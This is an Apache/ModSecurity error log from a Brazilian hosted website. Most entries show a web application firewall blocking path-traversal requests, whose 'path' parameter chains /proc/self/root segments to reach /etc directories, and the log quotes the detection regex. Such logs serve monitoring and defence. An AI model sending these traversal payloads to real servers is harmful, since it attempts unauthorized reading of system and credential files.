[Tue Mar 17 18:38:04.593397 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.31:48532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJvKBJNF7axNlVR0Uy6AAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:06.260812 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:48542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJvnIk7brgkOH-rIWnKAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:08.221356 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.243.128:58186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJwBj0p0SRWAqcjGGUUgAAAws"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:38:08.894660 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:53764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJwOyqAr6etmhZHNpCPgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:19.198874 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:58076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJy-yqAr6etmhZHNpCRQAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:20.134666 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45600] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:38:27.950659 2026] [mime_magic:error] [pid 2473:tid 140411632822016] (70014)End of file found: [client 74.7.241.31:58078] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib
[Tue Mar 17 18:38:30.065180 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:49410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJ1tY0UrI5A3LftIwYugAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:41.125880 2026] [proxy_fcgi:error] [pid 7004:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:38:42.486796 2026] [:error] [pid 6296:tid 140411741927168] [client 74.7.241.31:58010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJ4nIk7brgkOH-rIWnNQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:45.928387 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.241.31:58018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJ5aBJNF7axNlVR0UzBQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:38:56.127389 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.243.128:42010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnJ8Ih-PF_25v4hFRCE1AAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:39:04.045876 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46658] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:39:12.159926 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:51582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKANY0UrI5A3LftIwYzgAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:13.019097 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:51582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKAdY0UrI5A3LftIwYzwAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:15.555019 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:58762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKA_PqhzTj3BvfDX-hzwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:19.038993 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:44534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKBcU6Sx0TG1YjmQjI9AAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:26.141812 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47190] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:39:29.393652 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:41252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKEdY0UrI5A3LftIwY3AAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:31.012509 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.241.31:41260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKE3Ik7brgkOH-rIWnTwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:32.499352 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.241.31:41268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKFMU6Sx0TG1YjmQjI-AAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:33.932954 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.241.31:41270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKFcU6Sx0TG1YjmQjI-QAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:37.166232 2026] [:error] [pid 2598:tid 140411607643904] [client 74.7.241.31:41284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKGBj0p0SRWAqcjGGUdAAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:38.551904 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.31:46828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKGqBJNF7axNlVR0UzHQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:48.153942 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47772] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:39:49.927122 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.31:46834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKJaBJNF7axNlVR0UzIgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:52.356092 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.241.31:46834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKKKBJNF7axNlVR0UzJAAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
